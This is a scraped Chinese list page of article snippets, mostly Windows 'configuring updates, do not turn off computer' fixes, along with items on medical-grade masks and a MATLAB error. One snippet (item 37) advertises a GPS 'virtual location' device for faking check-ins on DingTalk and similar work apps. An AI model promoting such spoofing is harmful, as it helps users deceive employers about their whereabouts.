    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/4 23:55:01
  25. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  26. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  27. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  28. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  29. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  30. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  31. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  32. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  33. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  34. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  35. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  36. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  37. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  38. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  39. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  40. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  41. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  42. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  43. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  44. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  45. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57